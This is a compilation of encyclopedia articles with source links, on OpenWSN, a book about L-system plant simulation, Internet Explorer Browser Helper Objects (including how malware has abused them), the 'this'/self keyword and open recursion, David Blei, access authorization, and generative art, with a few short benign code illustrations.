OpenWSN[1][2] is a project created at the University of California, Berkeley and extended at INRIA and at the Open University of Catalonia (UOC),[3] which aims to build an open, standards-based and open source implementation of a complete constrained network protocol stack for wireless sensor networks and the Internet of Things. The root of OpenWSN is a deterministic MAC layer implementing IEEE 802.15.4e Time Slotted Channel Hopping (TSCH). Above the MAC layer, the low-power lossy network stack is based on IETF standards, including the IETF 6TiSCH management and adaptation layer (a minimal configuration profile, the 6top protocol and different scheduling functions). The stack is complemented by implementations of 6LoWPAN, RPL in non-storing mode, UDP and CoAP, enabling access to devices running the stack from native IPv6 through open standards.
OpenWSN is related to other projects including the following:
OpenWSN is available for Linux, Windows and OS X platforms. The current release of OpenWSN is 1.14.0.
|
https://en.wikipedia.org/wiki/OpenWSN
|
The Algorithmic Beauty of Plants is a book by Przemyslaw Prusinkiewicz and Aristid Lindenmayer. It is notable as the first comprehensive volume on the computer simulation of certain patterns in nature found in plant development (L-systems).
The book is no longer in print but is available free online.[1]
The book has eight chapters:
George Klir, reviewing the book in the International Journal of General Systems, writes that "This book, full of beautiful pictures of plants of great variety, is a testimony of the genius of Aristid Lindenmayer, who invented in 1968 systems that are now named by him -- Lindenmayer systems or L-systems. It is also a testimony of the power of current computer technology. The pictures in the book are not photographs of real plants. They are all generated on the computer by relatively simple algorithms based upon the idea of L-systems."[2] Klir goes on to explain the mathematics of L-systems, involving replacement of strings of symbols with further strings according to production rules, adding that "high computer power is essential since the generation of realistic forms requires tremendous numbers of replacements and the geometric interpretation of the generated strings requires a highly sophisticated computer graphics".[2]
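The parallel string rewriting Klir describes can be sketched in a few lines. The rules below are Lindenmayer's classic algae model, a standard textbook example assumed here rather than quoted from the book itself.

```python
# Minimal L-system sketch: every symbol in the string is replaced in
# parallel according to production rules, one pass per generation.

def lsystem(axiom, rules, steps):
    s = axiom
    for _ in range(steps):
        # symbols without a production are copied unchanged
        s = "".join(rules.get(ch, ch) for ch in s)
    return s

# Lindenmayer's algae rules: A -> AB, B -> A
algae = {"A": "AB", "B": "A"}
assert lsystem("A", algae, 1) == "AB"
assert lsystem("A", algae, 4) == "ABAABABA"
# string lengths follow the Fibonacci numbers
assert [len(lsystem("A", algae, n)) for n in range(6)] == [1, 2, 3, 5, 8, 13]
```

Rendering such strings as plant-like images then requires a geometric (e.g. turtle-graphics) interpretation of the symbols, which is the "sophisticated computer graphics" step Klir mentions.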
Adrian Bell, reviewing the book in New Phytologist, writes that it demands respect for three reasons, namely that it is the first book to explain the algorithms behind virtual plants, it "unashamedly" connects art and science, and it is unusual in being a real book on a computer-based subject. Each chapter, writes Bell, is an introductory manual to the simulation of an aspect of plant form, resulting "eventually" in a 3-D image of a plant architecture.[3]
Peter Antonelli, reviewing the book in SIAM Review, writes that it presents a "beautifully designed 'coffee-table-book'" summary of Lindenmayer's school of thought, explaining how algorithmic language theory, like Noam Chomsky's theory of grammar, can describe how repeated structural units arrange themselves. Antonelli suggests that Goethe would have disapproved of having the barrier of mathematics between the observer and the observed.[4]
Karl Niklas, reviewing the book in The Quarterly Review of Biology, writes that the book, intended for many different audiences, is "unequally successful" in reaching them. Niklas suggests that those who wonder how graphic artists create "the magnificent cyber-floras that sway and grow so realistically in the movies", and those who admire plant symmetry, will enjoy the book. He is more skeptical about its claim to serious science, as the book "fails to educate its readers" about the challenge of understanding plant form in terms of developmental biology. Therefore he believes the book falls short, the dazzling beauty of fractals not proving their relevance to biology.[5]
|
https://en.wikipedia.org/wiki/The_Algorithmic_Beauty_of_Plants
|
A Browser Helper Object (BHO) is a DLL module designed as a plugin for the Microsoft Internet Explorer web browser to provide added functionality. BHOs were introduced in October 1997 with the release of version 4 of Internet Explorer. Most BHOs are loaded once by each new instance of Internet Explorer. However, in the case of Windows Explorer, a new instance is launched for each window.
BHOs are still supported as of Windows 10, through Internet Explorer 11, while BHOs are not supported in Microsoft Edge.
Each time a new instance of Internet Explorer starts, it checks the Windows Registry for the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects. If Internet Explorer finds this key in the registry, it looks for CLSID keys listed below it. The CLSID keys under Browser Helper Objects tell the browser which BHOs to load; removing a registry key prevents that BHO from being loaded. For each CLSID listed below the BHO key, Internet Explorer calls CoCreateInstance to start an instance of the BHO in the same process space as the browser. If the BHO is started and implements the IObjectWithSite interface, it can control and receive events from Internet Explorer. BHOs can be created in any language that supports COM.[1]
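Registration therefore amounts to listing a component's CLSID under that key. A hypothetical registry fragment might look like the following; the GUID is a placeholder, not a real component, and the optional NoExplorer value (which keeps the BHO out of Windows Explorer) is shown as an illustrative assumption.

```
Windows Registry Editor Version 5.00

; Hypothetical BHO registration: Internet Explorer enumerates the CLSID
; subkeys of this key at startup and calls CoCreateInstance on each one.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00000000-0000-0000-0000-000000000000}]
"NoExplorer"=dword:00000001
```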
Some modules enable the display of different file formats not ordinarily interpretable by the browser. The Adobe Acrobat plug-in that allows Internet Explorer users to read PDF files within their browser is a BHO.
Other modules add toolbars to Internet Explorer, such as the Alexa Toolbar, which provides a list of web sites related to the one currently being browsed, or the Google Toolbar, which adds a toolbar with a Google search box to the browser user interface.
The Conduit toolbars are based on a BHO that can be used on Internet Explorer 7 and up. This BHO provides a search facility that connects to Microsoft's Bing search.
The BHO API exposes hooks that allow the BHO to access the Document Object Model (DOM) of the current page and to control navigation. Because BHOs have unrestricted access to the Internet Explorer event model, some forms of malware (such as adware and spyware) have also been created as BHOs.[2][3]
For example, the Download.ject malware is a BHO that is activated when a secure HTTP connection is made to a financial institution, then begins to record keystrokes for the purpose of capturing user passwords. The MyWay Searchbar tracks users' browsing patterns and passes the information it records to third parties. The C2.LOP malware adds links and popups of its own to web pages in order to drive users to pay-per-click websites.[citation needed]
Many BHOs introduce visible changes to a browser's interface, such as installing toolbars in Internet Explorer and the like, but others run without any change to the interface. This makes it easy for malicious coders to conceal the actions of their browser add-on, especially since, after being installed, the BHO seldom requires permission before performing further actions. For instance, variants of the ClSpring trojan use BHOs to install scripts that carry out a number of instructions, such as adding and deleting registry values and downloading additional executable files, all completely transparently to the user.[4]
In response to the problems associated with BHOs and similar extensions to Internet Explorer, Microsoft debuted an Add-on Manager in Internet Explorer 6 with the release of Service Pack 2 for Windows XP (updating it to IE6 Security Version 1, a.k.a. SP2). This utility displays a list of all installed BHOs, browser extensions and ActiveX controls, and allows the user to enable or disable them at will. There are also free tools (such as BHODemon) that list installed BHOs and allow the user to disable malicious extensions. Spybot S&D advanced mode has a similar tool built in to allow the user to disable installed BHOs.
|
https://en.wikipedia.org/wiki/Browser_Helper_Object
|
this, self, and Me are keywords used in some computer programming languages to refer to the object, class, or other entity of which the currently running code is a part. The entity referred to thus depends on the execution context (such as which object has its method called). Different programming languages use these keywords in slightly different ways. In languages where a keyword like "this" is mandatory, the keyword is the only way to access data and methods stored in the current object. Where optional, these keywords can disambiguate variables and functions with the same name.
In many object-oriented programming languages, this (also called self or Me) is a variable that is used in instance methods to refer to the object on which they are working. The first OO language, SIMULA 67, used this to explicitly reference the local object.[1]: 4.3.2.3 C++ and languages which derive in style from it (such as Java, C#, D, and PHP) also generally use this. Smalltalk and others, such as Object Pascal, Perl, Python, Ruby, Rust, Objective-C, DataFlex and Swift, use self. Microsoft's Visual Basic uses Me.
The concept is similar in all languages: this is usually an immutable reference or pointer which refers to the current object, the current object often being the code that acts as 'parent' or 'invocant' to the property, method, sub-routine or function that contains the this keyword. After an object is properly constructed, or instantiated, this is always a valid reference. Some languages require it explicitly; others use lexical scoping to use it implicitly to make symbols within their class visible. Alternatively, the current object referred to by this may be an independent code object that has called the function or method containing the keyword this. Such a thing happens, for example, when a JavaScript event handler attached to an HTML tag in a web page calls a function containing the keyword this stored in the global space outside the document object; in that context, this will refer to the page element within the document object, not the enclosing window object.[2]
In some languages, for example C++, Java, and Raku, this or self is a keyword, and the variable automatically exists in instance methods. In others, for example Python, Rust, and Perl 5, the first parameter of an instance method is such a reference. It needs to be specified explicitly. In Python and Perl, the parameter need not necessarily be named this or self; it can be named freely by the programmer like any other parameter. However, by informal convention, the first parameter of an instance method in Perl or Python is named self. Rust requires the self object to be called &self or self, depending on whether the invoked function borrows the invocant or moves it in, respectively.
Static methods in C++ or Java are not associated with instances but with classes, and so cannot use this, because there is no object. In other languages, such as Ruby, Smalltalk, Objective-C, or Swift, the method is associated with a class object that is passed as this, and they are called class methods. For class methods, Python uses cls to access the class object.
When lexical scoping is used to infer this, the use of this in code, while not illegal, may raise warning bells to a maintenance programmer, although there are still legitimate uses of this in this case, such as referring to instance variables hidden by local variables of the same name, or if the method wants to return a reference to the current object, i.e. this, itself.
In some compilers (for example GCC), pointers to C++ instance methods can be directly cast to a pointer of another type, with an explicit this pointer parameter.[3]
The dispatch semantics of this, namely that method calls on this are dynamically dispatched, is known as open recursion, and means that these methods can be overridden by derived classes or objects. By contrast, direct named recursion or anonymous recursion of a function uses closed recursion, with static dispatch. For example, in Perl code for the factorial, the token __SUB__ is a reference to the current function.
By contrast, in C++ (using an explicit this for clarity, though it is not necessary) this binds to the object itself, but if the class method was declared "virtual", i.e. polymorphic in the base, it is resolved via dynamic dispatch so that derived classes can override it.
This example is artificial, since this is direct recursion, so overriding the factorial method would override this function; more natural examples are when a method in a derived class calls the same method in a base class, or in cases of mutual recursion.[4][5]
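The distinction can be sketched in Python, standing in for the Perl and C++ versions discussed above (class names are invented for the illustration).

```python
# Open vs. closed recursion. A call through self is dispatched dynamically,
# so a subclass override intercepts the base class's recursive step; a
# direct call to a module-level function is closed and cannot be overridden.

def fact(n: int) -> int:
    # closed recursion: 'fact' binds statically to this function
    return 1 if n == 0 else n * fact(n - 1)

class Base:
    def factorial(self, n: int) -> int:
        # open recursion: the recursive step goes through self
        return 1 if n == 0 else n * self.factorial(n - 1)

class Doubling(Base):
    def factorial(self, n: int) -> int:
        # the override intercepts every recursive call made via self
        return 2 * super().factorial(n)

assert fact(3) == 6
assert Base().factorial(3) == 6
# each of the 4 calls (n = 3, 2, 1, 0) is doubled: 2^4 * 3! = 96
assert Doubling().factorial(3) == 96
```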
The fragile base class problem has been blamed on open recursion, with the suggestion that invoking methods on this default to closed recursion (static dispatch) rather than open recursion (dynamic dispatch), only using open recursion when it is specifically requested; external calls (not using this) would be dynamically dispatched as usual.[6][7] The way this is solved in practice in the JDK is through a certain programmer discipline; this discipline has been formalized by C. Ruby and G. T. Leavens and consists of the following rules:[8]
Early versions of C++ would let the this pointer be changed; by doing so a programmer could change which object a method was working on. This feature was eventually removed, and now this in C++ is an r-value.[9]
Early versions of C++ did not include references, and it has been suggested that had they been in C++ from the beginning, this would have been a reference, not a pointer.[10]
C++ lets objects destroy themselves with the source code statement: delete this.
The keyword this in C# works the same way as in Java, for reference types. However, within C# value types, this has quite different semantics, being similar to an ordinary mutable variable reference, and can even occur on the left side of an assignment.
One use of this in C# is to allow reference to an outer field variable within a method that contains a local variable of the same name. In such a situation, for example, the statement var n = localAndFieldname; within the method will assign the type and value of the local variable localAndFieldname to n, whereas the statement var n = this.localAndFieldname; will assign the type and value of the outer field variable to n.[11]
In D, this in a class, struct, or union method refers to an immutable reference of the instance of the enclosing aggregate. Classes are reference types, and structs and unions are value types. In the first version of D, the keyword this is used as a pointer to the instance of the object the method is bound to, while in D2 it has the character of an implicit ref function argument.
In the programming language Dylan, which is an object-oriented language that supports multimethods and doesn't have a concept of this, sending a message to an object is still kept in the syntax. The two forms below work in the same way; the differences are just syntactic sugar.
and
Within a class text, the current type is the type obtained from the current class. Within features (routines, commands and queries) of a class, one may use the keyword Current to reference the current class and its features. The use of the keyword Current is optional, as it is implied by simply referring to the name of the current class feature openly. For example, one might have a feature `foo' in a class MY_CLASS and refer to it simply by its name.
[12]
Line #10 (above) has the implied reference to Current by the call to simple `foo'.
Line #10 (below) has the explicit reference to Current by the call to `Current.foo'.
Either approach is acceptable to the compiler, but the implied version (e.g. x := foo) is preferred as it is less verbose.
As with other languages, there are times when the use of the keyword Current is mandated, such as:
In the case of the code above, the call on line #11 to make_with_something passes the current class by explicitly passing the keyword Current.
The keyword this is a Java language keyword that represents the current instance of the class in which it appears. It is used to access class variables and methods.
Since all instance methods are virtual in Java, this can never be null.[13]
In JavaScript, which is a programming or scripting language used extensively in web browsers, this is an important keyword, although what it evaluates to depends on where it is used.
To work around the different meaning of this in nested functions such as DOM event handlers, it is a common idiom in JavaScript to save the this reference of the calling object in a variable (commonly called that or self), and then use the variable to refer to the calling object in nested functions.
For example:
Notably, JavaScript makes use of both this and the related keyword self[17] (in contrast to most other languages, which tend to employ one or the other), with self being restricted specifically to web workers.[18]
Finally, as a reliable way of specifically referencing the global (window or equivalent) object, JavaScript features the globalThis keyword.[19]
In Lua, self is created as syntactic sugar when functions are defined using the : operator.[20] When invoking a method using :, the object being indexed will be implicitly given as the first argument to the function being invoked.
For example, the following two functions are equivalent:
Lua itself is not object-oriented, but when combined with another feature called metatables, the use of self lets programmers define functions in a manner resembling object-oriented programming.
In PowerShell, the special automatic variable $_ contains the current object in the pipeline. You can use this variable in commands that perform an action on every object or on selected objects in a pipeline.[21]
Also, starting with PowerShell 5.0, which adds a formal syntax to define classes and other user-defined types,[22] the $this variable describes the current instance of the object.
In Python, there is no keyword for this. When a member function is called on an object, it invokes the member function with the same name on the object's class object, with the object automatically bound to the first argument of the function. Thus, the obligatory first parameter of instance methods serves as this; this parameter is conventionally named self, but can be named anything.
In class methods (created with the classmethod decorator), the first argument refers to the class object itself and is conventionally called cls; these are primarily used for inheritable constructors,[23] where the use of the class as a parameter allows subclassing the constructor. In static methods (created with the staticmethod decorator), no special first argument exists.
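The conventions above can be sketched as follows; the class and method names are invented for the illustration.

```python
# self is just the explicit first parameter of an instance method; cls is
# the class object passed to a classmethod (useful as an inheritable
# constructor); a staticmethod receives no special first argument.

class Point:
    def __init__(self, x: float, y: float):
        self.x, self.y = x, y

    def norm(self) -> float:                   # 'self' bound to the instance
        return (self.x ** 2 + self.y ** 2) ** 0.5

    @classmethod
    def origin(cls) -> "Point":                # 'cls' bound to the class
        return cls(0.0, 0.0)                   # subclasses get their own type

    @staticmethod
    def dot(a: "Point", b: "Point") -> float:  # no implicit argument at all
        return a.x * b.x + a.y * b.y

class Point3(Point):
    def __init__(self, x=0.0, y=0.0, z=0.0):
        super().__init__(x, y)
        self.z = z

p = Point(3.0, 4.0)
assert p.norm() == 5.0
assert Point.norm(p) == p.norm()        # the same call, p bound to self
assert type(Point3.origin()) is Point3  # inherited classmethod builds Point3
```

The last assertion shows why cls matters: because the inherited classmethod receives the subclass as cls, the constructor it defines is automatically inherited by Point3.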
In Rust, types are declared separately from the functions associated with them. Functions designed to be analogous to instance methods in more traditionally object-oriented languages must explicitly take self as their first parameter. These functions can then be called using instance.method() syntax sugar. For example:
This defines a type, Foo, which has four associated functions. The first, Foo::new(), is not an instance function and must be specified with the type prefix. The remaining three all take a self parameter in a variety of ways and can be called on a Foo instance using the dot-notation syntax sugar, which is equivalent to calling the type-qualified function name with an explicit self first parameter.
The Self language is named after this use of "self".
Self is strictly used within methods of a class.
Another way to refer to Self is to use ::.
|
https://en.wikipedia.org/wiki/Open_recursion
|
David Meir Blei is a professor in the Statistics and Computer Science departments at Columbia University. Prior to fall 2014 he was an associate professor in the Department of Computer Science at Princeton University. His work is primarily in machine learning.
His research interests include topic models, and he was one of the original developers of latent Dirichlet allocation, along with Andrew Ng and Michael I. Jordan. As of June 18, 2020, his publications had been cited 109,821 times, giving him an h-index of 97.[1]
Blei received the ACM Infosys Foundation Award in 2013. (This award is given to a computer scientist under the age of 45. It has since been renamed the ACM Prize in Computing.) He was named a Fellow of ACM "for contributions to the theory and practice of probabilistic topic modeling and Bayesian machine learning" in 2015.[2]
|
https://en.wikipedia.org/wiki/David_Blei
|
Authorization or authorisation (see spelling differences), in information security, computer security and IAM (identity and access management),[1] is the function of specifying rights/privileges for accessing resources, in most cases through an access policy, and then deciding whether a particular subject has privilege to access a particular resource. Examples of subjects include human users, computer software and other hardware on the computer. Examples of resources include individual files or an item's data, computer programs, computer devices and functionality provided by computer applications. For example, user accounts for human resources staff are typically configured with authorization for accessing employee records.
Authorization is closely related to access control, which is what enforces the authorization policy by deciding whether access requests to resources from (authenticated) consumers shall be approved (granted) or disapproved (rejected).[2]
Authorization should not be confused with authentication, which is the process of verifying someone's identity.
IAMconsists the following two phases: the configuration phase where a user account is created and its corresponding access authorization policy is defined, and the usage phase where user authentication takes place followed by access control to ensure that the user/consumer only gets access to resources for which they are authorized. Hence, access control incomputersystems andnetworksrelies on access authorization specified during configuration.
Authorization is the responsibility of an authority, such as a department manager, within the application domain, but is often delegated to a custodian such as a system administrator. Authorizations are expressed as access policies in some type of "policy definition application", e.g. in the form of an access control list or a capability, or a policy administration point, e.g. XACML.
Broken authorization is often listed as the number one risk in web applications.[3] On the basis of the "principle of least privilege", consumers should only be authorized to access whatever they need to do their jobs, and nothing more.[4]
"Anonymous consumers" or "guests" are consumers that have not been required to authenticate. They often have limited authorization. On a distributed system, it is often desirable to grant access without requiring a unique identity. Familiar examples of access tokens include keys, certificates and tickets: they grant access without proving identity.
A widely used framework for authorizing applications is OAuth 2. It provides a standardized way for third-party applications to obtain limited access to a user's resources without exposing their credentials.[5]
In modern systems, a widely used model for authorization is role-based access control (RBAC), where authorization is defined by granting subjects one or more roles and then checking that the resource being accessed has been assigned at least one of those roles.[5] However, with the rise of social media, relationship-based access control is gaining more prominence.[6]
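The RBAC check described above can be sketched in a few lines. This is a minimal illustration; the users, roles, and resources are invented for the example.

```python
# Minimal sketch of role-based access control (RBAC): subjects are granted
# roles, resources are tagged with the roles allowed to access them, and an
# access check passes when the two sets intersect. All names are illustrative.

user_roles = {
    "alice": {"hr_staff", "employee"},
    "bob": {"employee"},
}

resource_roles = {
    "employee_records": {"hr_staff"},        # only HR staff may access these
    "cafeteria_menu": {"employee", "guest"},
}

def is_authorized(subject: str, resource: str) -> bool:
    """Grant access iff the subject holds at least one role the resource allows."""
    return bool(user_roles.get(subject, set()) & resource_roles.get(resource, set()))
```

An unknown subject or resource maps to the empty set, so the check fails closed, which matches the principle of least privilege mentioned above.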
Even when access is controlled through a combination of authentication and access control lists, the problem of maintaining the authorization data is not trivial, and often represents as much administrative burden as managing authentication credentials. It is often necessary to change or remove a user's authorization: this is done by changing or deleting the corresponding access rules on the system. Using atomic authorization is an alternative to per-system authorization management, in which a trusted third party securely distributes authorization information.
In public policy, authorization is a feature of trusted systems used for security or social control.
In banking, an authorization is a hold placed on a customer's account when a purchase is made using a debit card or credit card.
In publishing, public lectures and other freely available texts are sometimes published without the approval of the author. These are called unauthorized texts. An example is the 2002 The Theory of Everything: The Origin and Fate of the Universe, which was collected from Stephen Hawking's lectures and published without his permission, as per copyright law.[citation needed]
|
https://en.wikipedia.org/wiki/Authorization
|
Generative art is post-conceptual art that has been created (in whole or in part) with the use of an autonomous system. An autonomous system in this context is generally one that is non-human and can independently determine features of an artwork that would otherwise require decisions made directly by the artist. In some cases the human creator may claim that the generative system represents their own artistic idea, and in others that the system takes on the role of the creator.
"Generative art" often refers to algorithmic art (algorithmically determined computer-generated artwork) and synthetic media (a general term for any algorithmically generated media), but artists can also make generative art using systems of chemistry, biology, mechanics and robotics, smart materials, manual randomization, mathematics, data mapping, symmetry, and tiling.
Generative algorithms (algorithms programmed to produce artistic works through predefined rules, stochastic methods, or procedural logic, often yielding dynamic, unique, and contextually adaptable outputs) are central to many of these practices.
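As a minimal illustration of such an algorithm (the rule and seed here are arbitrary choices, not any particular artist's system), a fixed procedural rule applied to a seeded random starting state yields output that is unpredictable in detail yet fully reproducible:

```python
import random

# A toy generative sketch: a fixed procedural rule (elementary cellular
# automaton rule 30) combined with a seeded random starting row produces
# a unique but repeatable text pattern. Parameters are illustrative.

def rule30_row(row):
    """Apply Wolfram's rule 30 to one row of 0/1 cells (zero padding at edges)."""
    padded = [0] + row + [0]
    return [padded[i - 1] ^ (padded[i] | padded[i + 1])
            for i in range(1, len(padded) - 1)]

def generate(width=32, steps=8, seed=42):
    rng = random.Random(seed)            # the seed makes each output repeatable
    row = [rng.randint(0, 1) for _ in range(width)]
    picture = []
    for _ in range(steps):
        picture.append("".join("#" if c else "." for c in row))
        row = rule30_row(row)
    return picture
```

Running `generate()` twice with the same seed yields the same "artwork", while each new seed yields a different member of the same visual family, which is the basic division of labour between artist-defined rules and system autonomy described above.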
The use of the word "generative" in the discussion of art has developed over time. The use of "artificial DNA" defines a generative approach to art focused on the construction of a system able to generate unpredictable events, all with a recognizable common character. The use of autonomous systems, required by some contemporary definitions, focuses on a generative approach where the controls are strongly reduced. This approach is also named "emergent". Margaret Boden and Ernest Edmonds have noted the use of the term "generative art" in the broad context of automated computer graphics in the 1960s, beginning with artwork exhibited by Georg Nees and Frieder Nake in 1965.[1] A. Michael Noll did his initial computer art, combining randomness with order, in 1962,[2] and exhibited it along with works by Béla Julesz in 1965.[3]
The terms "generative art" and "computer art" have been used in tandem, and more or less interchangeably, since the very earliest days.[1]
The first such exhibition showed the work of Nees in February 1965, which some claim was titled "Generative Computergrafik".[1] While Nees does not himself remember, this was the title of his doctoral thesis published a few years later.[4] The correct title of the first exhibition and catalog was "computer-grafik".[5] "Generative art" and related terms were in common use by several other early computer artists around this time, including Manfred Mohr[1] and Ken Knowlton. Vera Molnár (born 1924) is a French media artist of Hungarian origin. Molnár is widely considered to be a pioneer of generative art, and is also one of the first women to use computers in her art practice.
The term "generative art", with the meaning of dynamic artwork-systems able to generate multiple artwork-events, was clearly used for the first time at the "Generative Art" conference in Milan in 1998. The term has also been used to describe geometric abstract art where simple elements are repeated, transformed, or varied to generate more complex forms. Thus defined, generative art was practiced by the Argentinian artists Eduardo Mac Entyre and Miguel Ángel Vidal in the late 1960s. In 1972 the Romanian-born Paul Neagu created the Generative Art Group in Britain. It was populated exclusively by Neagu using aliases such as "Hunsy Belmood" and "Edward Larsocchi". In 1972 Neagu gave a lecture titled 'Generative Art Forms' at the Queen's University, Belfast Festival.[6][7]
In 1970 the School of the Art Institute of Chicago created a department called Generative Systems. As described by Sonia Landy Sheridan, the focus was on art practices using the then-new technologies for the capture, inter-machine transfer, printing and transmission of images, as well as the exploration of the aspect of time in the transformation of image information. Also noteworthy is John Dunn,[8] first a student and then a collaborator of Sheridan.[9]
In 1988 Clauser[10] identified the aspect of systemic autonomy as a critical element in generative art:
It should be evident from the above description of the evolution of generative art that process (or structuring) and change (or transformation) are among its most definitive features, and that these features and the very term 'generative' imply dynamic development and motion.
(the result) is not a creation by the artist but rather the product of the generative process - a self-precipitating structure.
In 1989 Celestino Soddu defined the Generative Design approach to Architecture and Town Design in his book Citta' Aleatorie.[11]
In 1989 Franke referred to "generative mathematics" as "the study of mathematical operations suitable for generating artistic images."[12]
From the mid-1990s Brian Eno popularized the terms generative music and generative systems, making a connection with earlier experimental music by Terry Riley, Steve Reich and Philip Glass.[13]
From the end of the 20th century, communities of generative artists, designers, musicians and theoreticians began to meet, forming cross-disciplinary perspectives.
The first meeting about generative art was in 1998, at the inaugural International Generative Art conference at Politecnico di Milano University, Italy.[14] In Australia, the Iterate conference on generative systems in the electronic arts followed in 1999.[15] On-line discussion has centered around the eu-gene mailing list,[16] which began late in 1999 and has hosted much of the debate which has defined the field.[17]: 1 These activities have more recently been joined by the Generator.x conference in Berlin starting in 2005.
In 2012 the new journal GASATHJ (Generative Art Science and Technology Hard Journal) was founded by Celestino Soddu and Enrica Colabella,[18] joining several generative artists and scientists in the editorial board.
Some have argued that as a result of this engagement across disciplinary boundaries, the community has converged on a shared meaning of the term. As Boden and Edmonds[1] put it in 2011:
Today, the term "Generative Art" is still current within the relevant artistic community. Since 1998 a series of conferences have been held in Milan with that title (Generativeart.com), and Brian Eno has been influential in promoting and using generative art methods (Eno, 1996). Both in music and in visual art, the use of the term has now converged on work that has been produced by the activation of a set of rules and where the artist lets a computer system take over at least some of the decision-making (although, of course, the artist determines the rules).
The call for the Generative Art conferences in Milan (held annually since 1998) includes Celestino Soddu's definition of generative art:
Generative Art is the idea realized as genetic code of artificial events, as construction of dynamic complex systems able to generate endless variations. Each Generative Project is a concept-software that works producing unique and non-repeatable events, like music or 3D Objects, as possible and manifold expressions of the generating idea strongly recognizable as a vision belonging to an artist / designer / musician / architect / mathematician.[19]
Discussion on the eu-gene mailing list was framed by the following definition by Adrian Ward from 1999:
Generative art is a term given to work which stems from concentrating on the processes involved in producing an artwork, usually (although not strictly) automated by the use of a machine or computer, or by using mathematic or pragmatic instructions to define the rules by which such artworks are executed.[20]
A similar definition is provided by Philip Galanter:[17]
Generative art refers to any art practice where the artist creates a process, such as a set of natural language rules, a computer program, a machine, or other procedural invention, which is then set into motion with some degree of autonomy contributing to or resulting in a completed work of art.
Around the 2020s, generative AI models learned to imitate the distinct style of particular authors. For example, a generative image model such as Stable Diffusion is able to model the stylistic characteristics of an artist like Pablo Picasso (including his particular brush strokes, use of colour, perspective, and so on), and a user can engineer a prompt such as "an astronaut riding a horse, by Picasso" to cause the model to generate a novel image applying the artist's style to an arbitrary subject. Generative image models have received significant backlash from artists who object to their style being imitated without their permission, arguing that this harms their ability to profit from their own work.[21]
Johann Kirnberger's Musikalisches Würfelspiel ("Musical Dice Game") of 1757 is considered an early example of a generative system based on randomness. Dice were used to select musical sequences from a numbered pool of previously composed phrases. This system provided a balance of order and disorder: the structure was based on an element of order on one hand and disorder on the other.[22]
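The dice-game mechanism can be sketched as follows. The phrase table here is a stand-in; Kirnberger's actual tables mapped dice totals to precomposed bars of music.

```python
import random

# Sketch of a Musikalisches Wuerfelspiel-style system (the pool of phrases
# is invented for illustration): dice rolls select one precomposed phrase
# per bar from a numbered table, balancing order (the fixed table) against
# disorder (the rolls).

phrase_table = {total: f"phrase-{total}" for total in range(2, 13)}  # dice totals 2..12

def compose(bars=8, seed=None):
    rng = random.Random(seed)
    piece = []
    for _ in range(bars):
        roll = rng.randint(1, 6) + rng.randint(1, 6)  # sum of two dice
        piece.append(phrase_table[roll])
    return piece
```

Every composition drawn this way is a new arrangement, yet every phrase comes from the fixed, precomposed pool, which is exactly the order/disorder balance described above.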
The fugues of J.S. Bach could be considered generative, in that there is a strict underlying process that is followed by the composer.[23] Similarly, serialism follows strict procedures which, in some cases, can be set up to generate entire compositions with limited human intervention.[24][25]
Composers such as John Cage,[26]: 13–15 Farmers Manual,[27] and Brian Eno[26]: 133 have used generative systems in their works.
The artist Ellsworth Kelly created paintings by using chance operations to assign colors in a grid. He also created works on paper that he then cut into strips or squares and reassembled using chance operations to determine placement.[28]
Artists such as Hans Haacke have explored processes of physical and social systems in an artistic context. François Morellet has used both highly ordered and highly disordered systems in his artwork. Some of his paintings feature regular systems of radial or parallel lines to create moiré patterns. In other works he has used chance operations to determine the coloration of grids.[29][30] Sol LeWitt created generative art in the form of systems expressed in natural language and systems of geometric permutation. Harold Cohen's AARON system is a longstanding project combining software artificial intelligence with robotic painting devices to create physical artifacts.[31] Steina and Woody Vasulka are video art pioneers who used analog video feedback to create generative art. Video feedback is now cited as an example of deterministic chaos, and the early explorations by the Vasulkas anticipated contemporary science by many years.
Software systems exploiting evolutionary computing to create visual form include those created by Scott Draves and Karl Sims.
The digital artist Joseph Nechvatal has exploited models of viral contagion.[32] Autopoiesis by Ken Rinaldo includes fifteen musical and robotic sculptures that interact with the public and modify their behaviors based on both the presence of the participants and each other.[26]: 144–145 Jean-Pierre Hebert and Roman Verostko are founding members of the Algorists, a group of artists who create their own algorithms to create art. A. Michael Noll, of Bell Telephone Laboratories, Incorporated, programmed computer art using mathematical equations and programmed randomness, starting in 1962.[33]
The French artist Jean-Max Albert, besides environmental sculptures like Iapetus[34] and O=C=O,[35] developed a project dedicated to vegetation itself, in terms of biological activity. The Calmoduline Monument project is based on the property of a protein, calmodulin, to bind selectively to calcium. Exterior physical constraints (wind, rain, etc.) modify the electric potential of the cellular membranes of a plant and consequently the flux of calcium; the calcium, in turn, controls the expression of the calmodulin gene.[36] The plant can thus, when there is a stimulus, modify its "typical" growth pattern. The basic principle of this monumental sculpture is that, to the extent that they could be picked up and transported, these signals could be enlarged, translated into colors and shapes, and show the plant's "decisions", suggesting a level of fundamental biological activity.[37]
Maurizio Bolognini works with generative machines to address conceptual and social concerns.[38] Mark Napier is a pioneer in data mapping, creating works based on the streams of zeros and ones in Ethernet traffic, as part of the "Carnivore" project. Martin Wattenberg pushed this theme further, transforming "data sets" as diverse as musical scores (in "Shape of Song", 2001) and Wikipedia edits (History Flow, 2003, with Fernanda Viegas) into dramatic visual compositions.
The Canadian artist San Base developed a "Dynamic Painting" algorithm in 2002. Using computer algorithms as "brush strokes", Base creates sophisticated imagery that evolves over time to produce a fluid, never-repeating artwork.[39]
Since 1996 there have been ambigram generators that automatically generate ambigrams.[40][41][42]
The Italian composer Pietro Grossi, a pioneer of computer music, extended his experiments to images in 1986 (using the same procedure as in his musical work), writing computer-graphics programs with specific auto-decisions and developing the concept of HomeArt, presented for the first time in the exhibition New Atlantis: the continent of electronic music, organized by the Venice Biennale in 1986.
Some contemporary artists who create generative visual artworks are John Maeda, Daniel Shiffman, Zachary Lieberman, Golan Levin, Casey Reas, Ben Fry, and Giles Whitaker.
For some artists, graphic user interfaces and computer code have become an independent art form in themselves. Adrian Ward created Auto-Illustrator as a commentary on software and generative methods applied to art and design.[citation needed]
In 1987 Celestino Soddu created the artificial DNA of Italian medieval towns, able to generate endless 3D models of cities identifiable as belonging to the idea.[43]
